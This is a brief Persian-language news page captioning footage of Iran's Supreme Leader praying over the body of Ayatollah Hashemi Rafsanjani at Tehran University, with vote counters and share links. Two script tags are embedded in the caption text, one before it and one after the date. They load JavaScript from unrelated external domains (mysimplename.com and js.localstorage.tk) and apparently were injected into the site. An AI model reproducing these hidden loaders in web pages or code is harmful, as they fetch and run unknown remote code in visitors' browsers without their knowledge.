لحظه تاریخی نماز رهبرمعظم انقلاب بر پیکر آیت الله هاشمی رفسنجانی


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>رهبر انقلاب با حضور در دانشگاه تهران بر پیکر آیت الله هاشمی رفسنجانی نماز خواندند و پس از پایان نماز ایشان با آیت الله هاشمی به وداع پرداختند.
21/10/95<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر
نظرات
(برای مشاهده نظرات کلیک کنید)